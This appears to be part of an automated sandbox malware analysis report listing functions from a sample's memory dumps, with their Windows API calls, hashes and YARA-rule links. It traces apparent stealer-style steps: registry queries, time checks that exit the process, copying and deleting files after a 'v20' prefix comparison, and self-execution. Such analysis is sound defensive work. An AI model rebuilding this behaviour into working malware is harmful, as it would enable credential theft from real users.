Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
Opcode Fuzzy Hash: 5b78046f85af627c09a299ab182c71b3d4e9139a28e8ef8ebe0ef0d4724f4f60
Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A

Function 0240D0D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 0240D108
GetCPInfo.KERNEL32(?,?), ref: 0240D11B
memset.MSVCRT ref: 0240D133
setSBUpLow.LIBCMT ref: 0240D209

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
Instruction ID: 33c257d7b0c51ffae5c9111947613386b53f2f525209da4000207ce3f4115818
Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
Instruction Fuzzy Hash: F731AF20E08251DAEB259FB588D437ABFA0EF4A314F1485BFD8958F2D1C738C48ACB51

Function 0246C049 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 0246C086
dllmain_crt_dispatch.LIBCMT ref: 0246C09D
dllmain_raw.LIBCMT ref: 0246C0E5
dllmain_crt_dispatch.LIBCMT ref: 0246C0F8
dllmain_raw.LIBCMT ref: 0246C10B

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction ID: 3ea30cf567314d9350c8606de6e264d4d23ef4f393d946692bb949bb72894c85
Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction Fuzzy Hash: 902182B2900615AFDB229F95CC8CABF7A6AEB95B94F05411BF89867210C7308D418FD2

Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,00A6DD90,?,004210F4,?,00000000,?), ref: 00416C0C
sscanf.NTDLL ref: 00416C39
SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,00A6DD90,?,004210F4), ref: 00416C52
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00A6DD90,?,004210F4), ref: 00416C60
ExitProcess.KERNEL32 ref: 00416C7A

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 0286e8e563faf4f9dba9a435e5910b50e17e840f8aa4026298b4842835600f94
Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
Opcode Fuzzy Hash: 0286e8e563faf4f9dba9a435e5910b50e17e840f8aa4026298b4842835600f94
Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69

Function 02406E27 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 02406E73
sscanf.NTDLL ref: 02406EA0
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02406EB9
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02406EC7
ExitProcess.KERNEL32 ref: 02406EE1

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
Instruction ID: 627074db41a5faacdc93ea66a346382c444d45f3695633fa45a023b842bb0e78
Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
Instruction Fuzzy Hash: 6521DCB5D14219ABCF14DFE4E8859EEB7BAFF48300F04852EE516E3250EB349644CB65

Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
HeapAlloc.KERNEL32(00000000), ref: 00417FCE
RegOpenKeyExA.ADVAPI32(80000002,00A6A4D0,00000000,00020119,?), ref: 00417FEE
RegQueryValueExA.ADVAPI32(?,00A71870,00000000,00000000,000000FF,000000FF), ref: 0041800F
RegCloseKey.ADVAPI32(?), ref: 00418022

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2

Function 024081F7 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0240822E
RtlAllocateHeap.NTDLL(00000000), ref: 02408235
RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 02408255
RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 02408276
RegCloseKey.ADVAPI32(?), ref: 02408289

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 534759f952f09075195cd7266f4e00f45ed6e1814ec4141559cf543333b7d346
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: 0D114FB1E45606EBD700CFD4DD85FABBBB9EB48B11F10422AF615AA280D7745940CBA1

Function 02407B17 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02407B2B
RtlAllocateHeap.NTDLL(00000000), ref: 02407B32
RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,02407AB0), ref: 02407B52
RegQueryValueExA.ADVAPI32(02407AB0,00420AB4,00000000,00000000,?,000000FF), ref: 02407B71
RegCloseKey.ADVAPI32(02407AB0), ref: 02407B7B

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 6f6364a00e7aacc8d78b31e9f579223503d03f8e0427aa958351dd3b921523a0
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: 8B01FFB5E45309BBDB00DBE4DC49FAEB779EF44701F10459AF605A6280E774AA40CB91

Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00A709A0,00000000,00000000,?,00409F71,00000000,00A709A0,00000000), ref: 004193FC
lstrcpyn.KERNEL32(006D7580,00A709A0,00A709A0,?,00409F71,00000000,00A709A0), ref: 00419420
lstrlenA.KERNEL32(00000000,?,00409F71,00000000,00A709A0), ref: 00419437
wsprintfA.USER32 ref: 00419457

Strings

%s%s, xrefs: 00419445

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96

Function 02409657 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(\nm,00000000,00000000,?,023FA1D8,00000000,006D6E5C,00000000), ref: 02409663
lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,023FA1D8,00000000,006D6E5C), ref: 02409687
lstrlen.KERNEL32(00000000,?,023FA1D8,00000000,006D6E5C), ref: 0240969E
wsprintfA.USER32 ref: 024096BE

Strings

\nm, xrefs: 0240965F, 0240967A, 0240967E, 02409690, 024096B4, 02409672, 02409662, 0240967D, 02409681, 024096BD

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: \nm
API String ID: 1206339513-1385846026
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: a7161df95b1f55d749a4cdd5c5d7dca0b7fec95d19483eb742e1cc411ce016aa
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 36011E75914108FFCB04DFA8DD84EAE7B79EF48704F108649F9098B341EB31AA40CB96

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91

Function 023F1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F151B
RtlAllocateHeap.NTDLL(00000000), ref: 023F1522
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 023F153E
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 023F155C
RegCloseKey.ADVAPI32(?), ref: 023F1566

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: 9afd24ac0df3b3eb8188c80a1505c8317a7f2ade59110260f675a2f5f492d49b
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: AE01E179E45209BFDB04DFD4DC49FAE7779EB48701F104199FA0597280E770AA008B91

Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CA7E

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__getptd.LIBCMT ref: 0041CA95
__amsg_exit.LIBCMT ref: 0041CAA3
__lock.LIBCMT ref: 0041CAB3
__updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE

Function 0240CCD9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0240CCE5

Part of subcall function 0240C507: __getptd_noexit.LIBCMT ref: 0240C50A
Part of subcall function 0240C507: __amsg_exit.LIBCMT ref: 0240C517

__getptd.LIBCMT ref: 0240CCFC
__amsg_exit.LIBCMT ref: 0240CD0A
__lock.LIBCMT ref: 0240CD1A
__updatetlocinfoEx_nolock.LIBCMT ref: 0240CD2E

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
Instruction ID: cb56f305c95a226c4ed20be87016e02a61504f774e37a5620efff59435595005
Opcode Fuzzy Hash: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
Instruction Fuzzy Hash: 01F01231904710DAD721FB6AD8C1B5E36919F44758F21437FD8049A6D0CB7465C1DE9A

Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
ExitProcess.KERNEL32 ref: 004169F5

Strings

<, xrefs: 00416979

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 481bee06d242abde933568f013da02446b1876ff8e644cd2aca9f9def8042716
Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
Opcode Fuzzy Hash: 481bee06d242abde933568f013da02446b1876ff8e644cd2aca9f9def8042716
Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69

Function 02406B37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02406B6A

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

ShellExecuteEx.SHELL32(0000003C), ref: 02406C2D
ExitProcess.KERNEL32 ref: 02406C5C

Strings

<, xrefs: 02406BE0

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
Instruction ID: 78550ea51aea3cf65082cb37504fb2bca07a0d4f0fa864c4a30aa7db9d535aac
Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
Instruction Fuzzy Hash: 0C3109B1801228AADB14EB91DD94FDDB77AAF58300F4041AEE205661D0DB746A88CF54

Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
wsprintfW.USER32 ref: 00418F08

Strings

%hs, xrefs: 00418EFF

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96

Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
lstrlenA.KERNEL32(00000000), ref: 0040ADEC

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

DeleteFileA.KERNEL32(00000000), ref: 0040AE73

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 9ac3cb0069b46d5fc6777aa9344fb252c67a0740c7fdcaa052c39dc2df181915
Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
Opcode Fuzzy Hash: 9ac3cb0069b46d5fc6777aa9344fb252c67a0740c7fdcaa052c39dc2df181915
Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A

Function 023FABF7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FAC78
lstrlen.KERNEL32(00000000,00000000), ref: 023FAD96
lstrlen.KERNEL32(00000000), ref: 023FB053

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023FA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4

DeleteFileA.KERNEL32(00000000), ref: 023FB0DA

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
Instruction ID: 97ae8641cbcfa3554cf7b0895e1eb2b00fe109888b22618bf1d4d97383bab991
